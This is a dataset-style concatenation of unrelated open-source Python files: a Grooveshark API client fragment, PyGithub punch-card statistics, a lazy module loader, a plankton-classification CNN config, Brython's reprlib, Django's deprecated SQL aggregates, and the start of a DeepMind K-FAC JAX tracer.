                video.date = datetime.date(year=int(song['Year']), month=1, day=1)
            except ValueError:
                # Year is sometimes empty or non-numeric.
                video.date = NotAvailable
            self.VIDEOS_FROM_SONG_RESULTS.append(video)
            yield video

    def create_video_from_album_result(self, songs):
        """Like create_video_from_songs_result but for album/playlist listings
        (different key names); returns a list."""
        self.VIDEOS_FROM_SONG_RESULTS = []
        videos = list()
        for song in songs:
            video = self.create_video(song)
            if video:
                self.VIDEOS_FROM_SONG_RESULTS.append(video)
                videos.append(video)
        return videos

    def create_video(self, song):
        """Build one video from an album-style song dict; skip entries with no
        duration (not streamable)."""
        if song['EstimateDuration']:
            video = GroovesharkVideo(song['SongID'])
            video.title = u'Song - %s' % song['Name'].encode('ascii', 'replace')
            video.author = u'%s' % song['ArtistName'].encode('ascii', 'replace')
            video.description = u'%s - %s' % (video.author, song['AlbumName'].encode('ascii', 'replace'))
            if song['CoverArtFilename']:
                video.thumbnail = Thumbnail(u'http://images.gs-cdn.net/static/albums/40_' + song['CoverArtFilename'])
            video.duration = datetime.timedelta(seconds=int(float(song['EstimateDuration'])))
            video.date = NotAvailable
            return video

    def create_collection_from_playlists_result(self, playlists, split_path):
        """Map playlist dicts to Collection entries under split_path."""
        items = list()
        for playlist in playlists:
            path = copy.deepcopy(split_path)
            path.append(u'%s' % playlist['PlaylistID'])
            items.append(Collection(path, u'%s' % (playlist['Name'])))
        return items

    def get_all_songs_from_playlist(self, playlistID):
        """Fetch and convert every song of the given playlist."""
        method = 'getPlaylistByID'
        parameters = {}
        parameters['playlistID'] = playlistID
        response = self.API_post(method, parameters, self.create_token(method))
        return self.create_video_from_album_result(response['result']['Songs'])

    def create_collection_from_albums_result(self, albums, split_path):
        """Map album dicts to Collection entries under split_path."""
        items = list()
        for album in albums:
            path = copy.deepcopy(split_path)
            path.append(u'%s' % album['AlbumID'])
            items.append(Collection(path, u'%s - %s' % (album['AlbumName'], album['ArtistName'])))
        return items

    def get_all_songs_from_album(self, album_id):
        """Fetch and convert every song of the given album."""
        method = 'albumGetAllSongs'
        parameters = {}
        parameters['prefetch'] = False
        parameters['mobile'] = True
        parameters['albumID'] = int(album_id)
        parameters['country'] = self.HEADER['country']
        response = self.API_post(method, parameters, self.create_token(method))
        return self.create_video_from_album_result(response['result'])

    def get_communication_token(self):
        """Fetch the per-session token required to sign every API call."""
        parameters = {'secretKey': hashlib.md5(self.HEADER["session"]).hexdigest()}
        result = self.API_post('getCommunicationToken', parameters)
        self.COMMUNICATION_TOKEN = result['result']

    def create_token(self, method):
        """Sign a method call: random 6-char salt + sha1 of the known recipe."""
        if self.COMMUNICATION_TOKEN is None:
            self.get_communication_token()
        rnd = (''.join(random.choice(string.hexdigits) for x in range(6)))
        return rnd + hashlib.sha1('%s:%s:%s:%s' % (method, self.COMMUNICATION_TOKEN, self.GROOVESHARK_CONSTANTS[2], rnd)).hexdigest()

    def get_video_from_song_id(self, song_id):
        """Look a song up in the last search results and attach its stream URL."""
        if self.VIDEOS_FROM_SONG_RESULTS:
            for video in self.VIDEOS_FROM_SONG_RESULTS:
                if video.id == song_id:
                    video.url = self.get_stream_url_from_song_id(song_id)
                    return video

    def get_stream_url_from_song_id(self, song_id):
        """Ask for a stream key and build the final stream URL."""
        method = 'getStreamKeyFromSongIDEx'
        parameters = {}
        parameters['prefetch'] = False
        parameters['mobile'] = True
        parameters['songID'] = int(song_id)
        parameters['country'] = self.HEADER['country']
        response = self.API_post(method, parameters, self.create_token(method))
        self.mark_song_downloaded_ex(response['result'])
        return u'http://%s/stream.php?streamKey=%s' % (response['result']['ip'], response['result']['streamKey'])

    # in order to simulate a real browser
    def mark_song_downloaded_ex(self, response):
        """Tell the API the stream was consumed (mimics the official client)."""
        method = 'markSongDownloadedEx'
        parameters = {}
        parameters['streamKey'] = response['streamKey']
        parameters['streamServerID'] = response['streamServerID']
        parameters['songID'] = response['SongID']
        response = self.API_post(method, parameters, self.create_token(method))

    def check_result(self, result):
        """Raise APIError on a fault or an empty result payload."""
        if 'fault' in result:
            raise APIError('%s' % result['fault']['message'])
        if not result['result']:
            raise APIError('%s' % "No response found")

    def API_post(self, method, parameters, token=None):
        """
        Submit a POST request to the website
        The JSON data is parsed and returned as a dictionary
        """
        data = self.create_json_data(method, parameters, token)
        req = self.create_request(method)
        response = self.openurl(req, data)
        return self.parse_response(response)

    def create_json_data(self, method, parameters, token):
        """Serialize the request envelope (header + method + parameters)."""
        data = {}
        data['header'] = self.HEADER
        data['header']['client'] = self.GROOVESHARK_CONSTANTS[0]
        data['header']['clientRevision'] = self.GROOVESHARK_CONSTANTS[1]
        if(token is not None):
            data['header']['token'] = token
        data['method'] = method
        data['parameters'] = parameters
        return simplejson.dumps(data)

    def create_request(self, method):
        """Build the JSON POST request; the method name is only a URL hint."""
        req = self.request_class('%s?%s' % (self.API_URL, method))
        req.add_header('Content-Type', 'application/json')
        return req

    def parse_response(self, response):
        """Decode the JSON body and validate it before returning."""
        result = simplejson.loads(response.read(), self.ENCODING)
        self.check_result(result)
        return result
| agpl-3.0 |
crwilcox/PyGithub | github/StatsPunchCard.py | 74 | 2341 | # -*- coding: utf-8 -*-
# ########################## Copyrights and license ############################
# #
# Copyright 2013 Vincent Jacques <vincent@vincent-jacques.net> #
# #
# This file is part of PyGithub. http://jacquev6.github.com/PyGithub/ #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
# ##############################################################################
import github.GithubObject
import github.NamedUser
class StatsPunchCard(github.GithubObject.NonCompletableGithubObject):
    """
    This class represents punch-card statistics: commit counts keyed by
    (day, hour). The reference can be found here
    http://developer.github.com/v3/repos/statistics/#get-the-number-of-commits-per-hour-in-each-day
    """

    def get(self, day, hour):
        """
        Get a specific element
        :param day: int
        :param hour: int
        :rtype: int
        """
        return self._dict[day, hour]

    def _initAttributes(self):
        # Mapping of (day, hour) -> commit count, filled by _useAttributes.
        self._dict = {}

    def _useAttributes(self, attributes):
        # Each raw entry is a [day, hour, commits] triple.
        for entry in attributes:
            day, hour, commits = entry
            self._dict[day, hour] = commits
| gpl-3.0 |
pdehaye/theming-edx-platform | common/lib/capa/capa/safe_exec/lazymod.py | 68 | 1207 | """A module proxy for delayed importing of modules.
From http://barnesc.blogspot.com/2006/06/automatic-python-imports-with-autoimp.html,
in the public domain.
"""
import sys
class LazyModule(object):
    """A lazy module proxy.

    The real import is deferred until the first attribute access.  Once
    loaded, the proxy adopts the module's own __dict__, so later lookups are
    plain attribute hits.  Unknown attributes are additionally tried as
    submodules (e.g. ``lazy_os.path`` triggers ``import os.path``).
    """
    def __init__(self, modname):
        # Write into __dict__ directly: the module is not imported yet.
        self.__dict__['__name__'] = modname
        self._set_mod(None)
    def _set_mod(self, mod):
        if mod is not None:
            # NOTE: this aliases the *module's* dict as the proxy's dict, so
            # the marker below is also visible on the module itself (by
            # design in the original autoimp recipe).
            self.__dict__ = mod.__dict__
        self.__dict__['_lazymod_mod'] = mod
    def _load_mod(self):
        # Import the target module and adopt its namespace.
        __import__(self.__name__)
        self._set_mod(sys.modules[self.__name__])
    def __getattr__(self, name):
        if self.__dict__['_lazymod_mod'] is None:
            self._load_mod()
        mod = self.__dict__['_lazymod_mod']
        if hasattr(mod, name):
            return getattr(mod, name)
        else:
            try:
                subname = '%s.%s' % (self.__name__, name)
                __import__(subname)
                submod = getattr(mod, name)
            except ImportError:
                raise AttributeError("'module' object has no attribute %r" % name)
            # Bug fix: the original did ``LazyModule(subname, submod)``, but
            # __init__ only accepts a module name, so every submodule access
            # raised TypeError.  Cache the imported submodule directly.
            self.__dict__[name] = submod
            return self.__dict__[name]
| agpl-3.0 |
sendit2me/kaggle-ndsb | configurations/bagging_00_convroll4_big_wd_maxout512.py | 6 | 5478 | import numpy as np
import theano
import theano.tensor as T
import lasagne as nn
import data
import load
import nn_plankton
import dihedral
import dihedral_fast
import tmp_dnn
import tta
validation_split_path = "splits/bagging_split_0.pkl"
patch_size = (95, 95)
augmentation_params = {
'zoom_range': (1 / 1.6, 1.6),
'rotation_range': (0, 360),
'shear_range': (-20, 20),
'translation_range': (-10, 10),
'do_flip': True,
'allow_stretch': 1.3,
}
batch_size = 128 // 4
chunk_size = 32768 // 4
num_chunks_train = 840
momentum = 0.9
learning_rate_schedule = {
0: 0.003,
700: 0.0003,
800: 0.00003,
}
validate_every = 20
save_every = 20
def estimate_scale(img):
    """Scale factor relative to an 85-pixel reference: longest side / 85."""
    height, width = img.shape[0], img.shape[1]
    return np.maximum(height, width) / 85.0
# Test-time augmentation: 70 quasirandom transforms, averaged at prediction
# time (the commented block below is the older deterministic grid version).
# augmentation_transforms_test = []
# for flip in [True, False]:
#     for zoom in [1/1.3, 1/1.2, 1/1.1, 1.0, 1.1, 1.2, 1.3]:
#         for rot in np.linspace(0.0, 360.0, 5, endpoint=False):
#             tf = data.build_augmentation_transform(zoom=(zoom, zoom), rotation=rot, flip=flip)
#             augmentation_transforms_test.append(tf)
augmentation_transforms_test = tta.build_quasirandom_transforms(70, **{
    'zoom_range': (1 / 1.4, 1.4),
    'rotation_range': (0, 360),
    'shear_range': (-10, 10),
    'translation_range': (-8, 8),
    'do_flip': True,
    'allow_stretch': 1.2,
})
# Zero-mean-unit-variance loader wiring together all settings above.
data_loader = load.ZmuvRescaledDataLoader(estimate_scale=estimate_scale, num_chunks_train=num_chunks_train,
    patch_size=patch_size, chunk_size=chunk_size, augmentation_params=augmentation_params,
    augmentation_transforms_test=augmentation_transforms_test, validation_split_path=validation_split_path)
# cuDNN-backed layers (the cuda-convnet variants are kept for reference).
# Conv2DLayer = nn.layers.cuda_convnet.Conv2DCCLayer
# MaxPool2DLayer = nn.layers.cuda_convnet.MaxPool2DCCLayer
Conv2DLayer = tmp_dnn.Conv2DDNNLayer
MaxPool2DLayer = tmp_dnn.MaxPool2DDNNLayer
def build_model():
    """Build the conv net: cyclic slicing, 4 conv/pool stages with cyclic
    rolling, then two maxout dense layers pooled over the 4 orientations.

    Returns ([input_layer], output_layer).
    """
    l0 = nn.layers.InputLayer((batch_size, 1, patch_size[0], patch_size[1]))
    # Stack the 4 rotations of each input along the batch axis.
    l0c = dihedral.CyclicSliceLayer(l0)
    # Stage 1: 32->16 filters, 3x3, overlapping 3x3/stride-2 pooling.
    l1a = Conv2DLayer(l0c, num_filters=32, filter_size=(3, 3), border_mode="same", W=nn_plankton.Conv2DOrthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=nn_plankton.leaky_relu, untie_biases=True)
    l1b = Conv2DLayer(l1a, num_filters=16, filter_size=(3, 3), border_mode="same", W=nn_plankton.Conv2DOrthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=nn_plankton.leaky_relu, untie_biases=True)
    l1 = MaxPool2DLayer(l1b, ds=(3, 3), strides=(2, 2))
    # Exchange feature maps between the 4 orientation copies.
    l1r = dihedral_fast.CyclicConvRollLayer(l1)
    # Stage 2.
    l2a = Conv2DLayer(l1r, num_filters=64, filter_size=(3, 3), border_mode="same", W=nn_plankton.Conv2DOrthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=nn_plankton.leaky_relu, untie_biases=True)
    l2b = Conv2DLayer(l2a, num_filters=32, filter_size=(3, 3), border_mode="same", W=nn_plankton.Conv2DOrthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=nn_plankton.leaky_relu, untie_biases=True)
    l2 = MaxPool2DLayer(l2b, ds=(3, 3), strides=(2, 2))
    l2r = dihedral_fast.CyclicConvRollLayer(l2)
    # Stage 3: three conv layers.
    l3a = Conv2DLayer(l2r, num_filters=128, filter_size=(3, 3), border_mode="same", W=nn_plankton.Conv2DOrthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=nn_plankton.leaky_relu, untie_biases=True)
    l3b = Conv2DLayer(l3a, num_filters=128, filter_size=(3, 3), border_mode="same", W=nn_plankton.Conv2DOrthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=nn_plankton.leaky_relu, untie_biases=True)
    l3c = Conv2DLayer(l3b, num_filters=64, filter_size=(3, 3), border_mode="same", W=nn_plankton.Conv2DOrthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=nn_plankton.leaky_relu, untie_biases=True)
    l3 = MaxPool2DLayer(l3c, ds=(3, 3), strides=(2, 2))
    l3r = dihedral_fast.CyclicConvRollLayer(l3)
    # Stage 4.
    l4a = Conv2DLayer(l3r, num_filters=256, filter_size=(3, 3), border_mode="same", W=nn_plankton.Conv2DOrthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=nn_plankton.leaky_relu, untie_biases=True)
    l4b = Conv2DLayer(l4a, num_filters=256, filter_size=(3, 3), border_mode="same", W=nn_plankton.Conv2DOrthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=nn_plankton.leaky_relu, untie_biases=True)
    l4c = Conv2DLayer(l4b, num_filters=128, filter_size=(3, 3), border_mode="same", W=nn_plankton.Conv2DOrthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=nn_plankton.leaky_relu, untie_biases=True)
    l4 = MaxPool2DLayer(l4c, ds=(3, 3), strides=(2, 2))
    l4r = dihedral_fast.CyclicConvRollLayer(l4)
    l4f = nn.layers.flatten(l4r)
    # Dense maxout (FeaturePool ds=2 halves 1024 units to 512 maxout units).
    l5 = nn.layers.DenseLayer(nn.layers.dropout(l4f, p=0.5), num_units=1024, W=nn_plankton.Orthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=None)
    l5fp = nn.layers.FeaturePoolLayer(l5, ds=2)
    l5r = dihedral_fast.CyclicRollLayer(l5fp)
    l6 = nn.layers.DenseLayer(nn.layers.dropout(l5r, p=0.5), num_units=1024, W=nn_plankton.Orthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=None)
    l6fp = nn.layers.FeaturePoolLayer(l6, ds=2)
    # Pool the 4 orientation copies back into one (root-mean-square).
    l6m = dihedral.CyclicPoolLayer(l6fp, pool_function=nn_plankton.rms)
    l7 = nn.layers.DenseLayer(nn.layers.dropout(l6m, p=0.5), num_units=data.num_classes, nonlinearity=T.nnet.softmax, W=nn_plankton.Orthogonal(1.0))
    return [l0], l7
def build_objective(l_ins, l_out):
    """Log-loss objective with L2 weight decay on all non-bias parameters."""
    lambda_reg = 0.0005
    params = nn.layers.get_all_non_bias_params(l_out)
    # Symbolic L2 penalty, shared by every call of the inner loss function.
    reg_term = sum(T.sum(p**2) for p in params)
    def loss(y, t):
        return nn_plankton.log_loss(y, t) + lambda_reg * reg_term
    return nn.objectives.Objective(l_out, loss_function=loss)
| mit |
linjoahow/2015cda_lego | static/Brython3.1.3-20150514-095342/Lib/reprlib.py | 923 | 5110 | """Redo the builtin repr() (representation) but with limits on most sizes."""
__all__ = ["Repr", "repr", "recursive_repr"]
import builtins
from itertools import islice
try:
from _thread import get_ident
except ImportError:
from _dummy_thread import get_ident
def recursive_repr(fillvalue='...'):
    'Decorator to make a repr function return fillvalue for a recursive call'

    def decorating_function(user_function):
        # (object id, thread id) pairs whose repr is currently being computed.
        active = set()

        def wrapper(self):
            marker = id(self), get_ident()
            if marker in active:
                # Re-entered for the same object on the same thread: cut the
                # recursion short.
                return fillvalue
            active.add(marker)
            try:
                return user_function(self)
            finally:
                active.discard(marker)

        # Can't use functools.wraps() here because of bootstrap issues
        wrapper.__module__ = getattr(user_function, '__module__')
        wrapper.__doc__ = getattr(user_function, '__doc__')
        wrapper.__name__ = getattr(user_function, '__name__')
        wrapper.__annotations__ = getattr(user_function, '__annotations__', {})
        return wrapper

    return decorating_function
class Repr:
    """Produce repr()-like strings, truncating each container/scalar type to a
    configurable maximum size (stdlib reprlib implementation)."""
    def __init__(self):
        # Per-type limits: max nesting depth, max elements shown per
        # container, and max characters for strings/ints/other objects.
        self.maxlevel = 6
        self.maxtuple = 6
        self.maxlist = 6
        self.maxarray = 5
        self.maxdict = 4
        self.maxset = 6
        self.maxfrozenset = 6
        self.maxdeque = 6
        self.maxstring = 30
        self.maxlong = 40
        self.maxother = 30
    def repr(self, x):
        return self.repr1(x, self.maxlevel)
    def repr1(self, x, level):
        # Dispatch on the type name: repr_<typename>, else repr_instance.
        typename = type(x).__name__
        if ' ' in typename:
            # e.g. "method wrapper" -> attribute-safe "method_wrapper".
            parts = typename.split()
            typename = '_'.join(parts)
        if hasattr(self, 'repr_' + typename):
            return getattr(self, 'repr_' + typename)(x, level)
        else:
            return self.repr_instance(x, level)
    def _repr_iterable(self, x, level, left, right, maxiter, trail=''):
        # Shared helper: render up to maxiter elements between left/right
        # delimiters; trail is the singleton-tuple trailing comma.
        n = len(x)
        if level <= 0 and n:
            s = '...'
        else:
            newlevel = level - 1
            repr1 = self.repr1
            pieces = [repr1(elem, newlevel) for elem in islice(x, maxiter)]
            if n > maxiter: pieces.append('...')
            s = ', '.join(pieces)
            if n == 1 and trail: right = trail + right
        return '%s%s%s' % (left, s, right)
    def repr_tuple(self, x, level):
        return self._repr_iterable(x, level, '(', ')', self.maxtuple, ',')
    def repr_list(self, x, level):
        return self._repr_iterable(x, level, '[', ']', self.maxlist)
    def repr_array(self, x, level):
        header = "array('%s', [" % x.typecode
        return self._repr_iterable(x, level, header, '])', self.maxarray)
    def repr_set(self, x, level):
        # Sort (when possible) so the truncated output is deterministic.
        x = _possibly_sorted(x)
        return self._repr_iterable(x, level, 'set([', '])', self.maxset)
    def repr_frozenset(self, x, level):
        x = _possibly_sorted(x)
        return self._repr_iterable(x, level, 'frozenset([', '])',
                                   self.maxfrozenset)
    def repr_deque(self, x, level):
        return self._repr_iterable(x, level, 'deque([', '])', self.maxdeque)
    def repr_dict(self, x, level):
        n = len(x)
        if n == 0: return '{}'
        if level <= 0: return '{...}'
        newlevel = level - 1
        repr1 = self.repr1
        pieces = []
        for key in islice(_possibly_sorted(x), self.maxdict):
            keyrepr = repr1(key, newlevel)
            valrepr = repr1(x[key], newlevel)
            pieces.append('%s: %s' % (keyrepr, valrepr))
        if n > self.maxdict: pieces.append('...')
        s = ', '.join(pieces)
        return '{%s}' % (s,)
    def repr_str(self, x, level):
        s = builtins.repr(x[:self.maxstring])
        if len(s) > self.maxstring:
            # Keep roughly equal head and tail halves around an ellipsis.
            i = max(0, (self.maxstring-3)//2)
            j = max(0, self.maxstring-3-i)
            s = builtins.repr(x[:i] + x[len(x)-j:])
            s = s[:i] + '...' + s[len(s)-j:]
        return s
    def repr_int(self, x, level):
        s = builtins.repr(x) # XXX Hope this isn't too slow...
        if len(s) > self.maxlong:
            i = max(0, (self.maxlong-3)//2)
            j = max(0, self.maxlong-3-i)
            s = s[:i] + '...' + s[len(s)-j:]
        return s
    def repr_instance(self, x, level):
        try:
            s = builtins.repr(x)
        # Bugs in x.__repr__() can cause arbitrary
        # exceptions -- then make up something
        except Exception:
            return '<%s instance at %x>' % (x.__class__.__name__, id(x))
        if len(s) > self.maxother:
            i = max(0, (self.maxother-3)//2)
            j = max(0, self.maxother-3-i)
            s = s[:i] + '...' + s[len(s)-j:]
        return s
def _possibly_sorted(x):
# Since not all sequences of items can be sorted and comparison
# functions may raise arbitrary exceptions, return an unsorted
# sequence in that case.
try:
return sorted(x)
except Exception:
return list(x)
# Module-level singleton and the drop-in replacement for builtins.repr().
aRepr = Repr()
repr = aRepr.repr
| agpl-3.0 |
gdi2290/django | django/db/models/sql/aggregates.py | 18 | 4842 | """
Classes to represent the default SQL aggregate functions
"""
import copy
import warnings
from django.db.models.fields import IntegerField, FloatField
from django.db.models.lookups import RegisterLookupMixin
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.functional import cached_property
__all__ = ['Aggregate', 'Avg', 'Count', 'Max', 'Min', 'StdDev', 'Sum', 'Variance']
# Importing this module is itself deprecated; warn once at import time.
warnings.warn(
    "django.db.models.sql.aggregates is deprecated. Use "
    "django.db.models.aggregates instead.",
    RemovedInDjango20Warning, stacklevel=2)
class Aggregate(RegisterLookupMixin):
    """
    Default SQL Aggregate.
    """
    # is_ordinal: output is always an integer (e.g. COUNT).
    is_ordinal = False
    # is_computed: output is always a float (e.g. AVG), whatever the input.
    is_computed = False
    sql_template = '%(function)s(%(field)s)'
    def __init__(self, col, source=None, is_summary=False, **extra):
        """Instantiate an SQL aggregate
        * col is a column reference describing the subject field
          of the aggregate. It can be an alias, or a tuple describing
          a table and column name.
        * source is the underlying field or aggregate definition for
          the column reference. If the aggregate is not an ordinal or
          computed type, this reference is used to determine the coerced
          output type of the aggregate.
        * extra is a dictionary of additional data to provide for the
          aggregate definition
        Also utilizes the class variables:
        * sql_function, the name of the SQL function that implements the
          aggregate.
        * sql_template, a template string that is used to render the
          aggregate into SQL.
        * is_ordinal, a boolean indicating if the output of this aggregate
          is an integer (e.g., a count)
        * is_computed, a boolean indicating if this output of this aggregate
          is a computed float (e.g., an average), regardless of the input
          type.
        """
        self.col = col
        self.source = source
        self.is_summary = is_summary
        self.extra = extra
        # Follow the chain of aggregate sources back until you find an
        # actual field, or an aggregate that forces a particular output
        # type. This type of this field will be used to coerce values
        # retrieved from the database.
        tmp = self
        while tmp and isinstance(tmp, Aggregate):
            if getattr(tmp, 'is_ordinal', False):
                tmp = self._ordinal_aggregate_field
            elif getattr(tmp, 'is_computed', False):
                tmp = self._computed_aggregate_field
            else:
                tmp = tmp.source
        self.field = tmp
    # Two fake fields used to identify aggregate types in data-conversion operations.
    @cached_property
    def _ordinal_aggregate_field(self):
        return IntegerField()
    @cached_property
    def _computed_aggregate_field(self):
        return FloatField()
    def relabeled_clone(self, change_map):
        # Shallow copy with the table alias (first element of a
        # (table, column) tuple) remapped; a non-tuple col is kept as-is.
        clone = copy.copy(self)
        if isinstance(self.col, (list, tuple)):
            clone.col = (change_map.get(self.col[0], self.col[0]), self.col[1])
        return clone
    def as_sql(self, compiler, connection):
        "Return the aggregate, rendered as SQL with parameters."
        params = []
        if hasattr(self.col, 'as_sql'):
            field_name, params = self.col.as_sql(compiler, connection)
        elif isinstance(self.col, (list, tuple)):
            # NOTE(review): ``compiler`` is invoked as a callable here, i.e.
            # it is expected to be a quoting function in this legacy code
            # path — confirm against callers before relying on it.
            field_name = '.'.join(compiler(c) for c in self.col)
        else:
            field_name = compiler(self.col)
        substitutions = {
            'function': self.sql_function,
            'field': field_name
        }
        substitutions.update(self.extra)
        return self.sql_template % substitutions, params
    def get_group_by_cols(self):
        # Aggregates never contribute columns to GROUP BY.
        return []
    @property
    def output_field(self):
        return self.field
# Concrete aggregates: each maps to one SQL function, optionally forcing the
# output type (is_computed -> float, is_ordinal -> int).
class Avg(Aggregate):
    is_computed = True
    sql_function = 'AVG'
class Count(Aggregate):
    is_ordinal = True
    sql_function = 'COUNT'
    sql_template = '%(function)s(%(distinct)s%(field)s)'
    def __init__(self, col, distinct=False, **extra):
        # 'distinct' is spliced into the template as the literal prefix
        # "DISTINCT " (or nothing).
        super(Count, self).__init__(col, distinct='DISTINCT ' if distinct else '', **extra)
class Max(Aggregate):
    sql_function = 'MAX'
class Min(Aggregate):
    sql_function = 'MIN'
class StdDev(Aggregate):
    is_computed = True
    def __init__(self, col, sample=False, **extra):
        super(StdDev, self).__init__(col, **extra)
        # sample=True -> sample standard deviation, else population.
        self.sql_function = 'STDDEV_SAMP' if sample else 'STDDEV_POP'
class Sum(Aggregate):
    sql_function = 'SUM'
class Variance(Aggregate):
    is_computed = True
    def __init__(self, col, sample=False, **extra):
        super(Variance, self).__init__(col, **extra)
        self.sql_function = 'VAR_SAMP' if sample else 'VAR_POP'
deepmind/deepmind-research | kfac_ferminet_alpha/tracer.py | 1 | 13233 | # Copyright 2020 DeepMind Technologies Limited.
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for the Jax tracer functionality for tags."""
import functools
from typing import Any, Callable, Sequence, Tuple
import jax
from jax import core
from jax import util as jax_util
import jax.numpy as jnp
from kfac_ferminet_alpha import layers_and_loss_tags as tags
from kfac_ferminet_alpha import tag_graph_matcher as tgm
from kfac_ferminet_alpha import utils
_Function = Callable[[Any], Any]
_Loss = tags.LossTag
def extract_tags(
    jaxpr: core.Jaxpr
) -> Tuple[Sequence[core.JaxprEqn], Sequence[core.JaxprEqn]]:
  """Collects the layer-tag and loss-tag equations of a Jaxpr.

  Returns a pair ``(layer_tag_eqns, loss_tag_eqns)``, each a tuple of the
  equations whose primitive is the corresponding tag type, in program order.
  """
  loss_eqns = tuple(
      eqn for eqn in jaxpr.eqns if isinstance(eqn.primitive, tags.LossTag))
  # Mirror the original if/elif ordering: an equation counted as a loss tag
  # is never also counted as a layer tag.
  layer_eqns = tuple(
      eqn for eqn in jaxpr.eqns
      if not isinstance(eqn.primitive, tags.LossTag)
      and isinstance(eqn.primitive, tags.LayerTag))
  return layer_eqns, loss_eqns
def construct_compute_losses_inputs(
    jaxpr: core.Jaxpr,
    consts: Tuple[Any],
    num_losses: int,
    primals: Any,
    params_index: int) -> Callable[[Any], Sequence[Sequence[jnp.ndarray]]]:
  """Constructs a function that computes all of the inputs to all losses.

  The returned closure takes only the parameters (the entry of ``primals`` at
  ``params_index``), re-evaluates the traced ``jaxpr`` with them substituted
  in, and returns, for each loss tag, a tuple of the values flowing into it.
  This makes the loss inputs a pure function of the parameters, suitable for
  differentiation with jax.vjp/jax.jvp.
  """
  primals_ = list(primals)
  def forward_compute_losses(
      params_primals: Any,
  ) -> Sequence[Sequence[jnp.ndarray]]:
    # Substitute the parameter argument, keeping all other primals fixed.
    primals_[params_index] = params_primals
    flat_args = jax.tree_flatten(primals_)[0]
    # Mapping from variable -> value
    env = dict()
    read = functools.partial(tgm.read_env, env)
    write = functools.partial(tgm.write_env, env)
    # Bind args and consts to environment
    write(jax.core.unitvar, jax.core.unit)
    jax_util.safe_map(write, jaxpr.invars, flat_args)
    jax_util.safe_map(write, jaxpr.constvars, consts)
    # Loop through equations and evaluate primitives using `bind`;
    # stop early once the first `num_losses` loss tags have been reached.
    losses_so_far = 0
    loss_tags = []
    for eqn in jaxpr.eqns:
      tgm.evaluate_eqn(eqn, jax_util.safe_map(read, eqn.invars), write)
      if isinstance(eqn.primitive, tags.LossTag):
        loss_tags.append(eqn)
        losses_so_far += 1
        if num_losses is not None and losses_so_far == num_losses:
          break
    return tuple(tuple(read(v) for v in tag.invars) for tag in loss_tags)
  # return tuple(jax_util.safe_map(read, tag.invars) for tag in loss_tags)
  return forward_compute_losses
# We know when `.primitive` will be either a `LossTag` or a `LayerTag`, however
# pytype cannot infer its subclass, so we need to unbox it.
def _unbox_loss_tag(jaxpr_eqn: core.JaxprEqn) -> tags.LossTag:
  """Returns the equation's primitive, asserted to be a LossTag."""
  assert isinstance(jaxpr_eqn.primitive, tags.LossTag)
  return jaxpr_eqn.primitive
def _unbox_layer_tag(jaxpr_eqn: core.JaxprEqn) -> tags.LayerTag:
  """Returns the equation's primitive, asserted to be a LayerTag."""
  assert isinstance(jaxpr_eqn.primitive, tags.LayerTag)
  return jaxpr_eqn.primitive
def trace_losses_matrix_vector_vjp(tagged_func: _Function,
                                   params_index: int = 0):
  """Returns the Jacobian-transposed vector product (backward mode) function in equivalent form to jax.vjp."""
  def vjp(*primals):
    # Trace the tagged function and locate its loss-tag equations.
    typed_jaxpr = jax.make_jaxpr(tagged_func)(*primals)
    jaxpr, consts = typed_jaxpr.jaxpr, typed_jaxpr.literals
    _, loss_jaxpr_eqns = extract_tags(jaxpr)
    n = len(loss_jaxpr_eqns)
    # Build params -> loss-inputs as a pure function, then vjp through it.
    losses_func = construct_compute_losses_inputs(
        jaxpr, consts, n, primals, params_index)
    losses_inputs, full_vjp_func = jax.vjp(losses_func, primals[params_index])
    losses = []
    for jaxpr_eqn, inputs in zip(loss_jaxpr_eqns, losses_inputs):
      loss_tag = _unbox_loss_tag(jaxpr_eqn)
      losses.append(loss_tag.loss(*inputs, weight=jaxpr_eqn.params["weight"]))
    losses = tuple(losses)
    def vjp_func(tangents):
      flat_tangents = jax.tree_flatten(tangents)[0]
      loss_invars = []
      loss_targets = []
      for jaxpr_eqn, inputs in zip(loss_jaxpr_eqns, losses_inputs):
        num_inputs = _unbox_loss_tag(jaxpr_eqn).num_inputs
        loss_invars.append(tuple(jaxpr_eqn.invars[:num_inputs]))
        loss_targets.append(inputs[num_inputs:])
      treedef = jax.tree_structure(loss_invars)
      tangents = jax.tree_unflatten(treedef, flat_tangents)
      # Since the losses could also take targets as inputs and we don't want
      # this function to compute vjp w.r.t. those (e.g. the user should not
      # be providing tangent vectors for the targets, only for inputs) we have
      # to manually fill in these "extra" tangents with zeros.
      targets_tangents = jax.tree_map(jnp.zeros_like, loss_targets)
      tangents = tuple(ti + tti for ti, tti in zip(tangents, targets_tangents))
      input_tangents = full_vjp_func(tangents)[0]
      return input_tangents,
    return losses, vjp_func
  return vjp
def trace_losses_matrix_vector_jvp(
    tagged_func: _Function,
    params_index: int = 0):
  """Returns the Jacobian vector product (forward mode) function in equivalent form to jax.jvp."""
  def jvp(primals, params_tangents):
    # Trace the tagged function and locate its loss-tag equations.
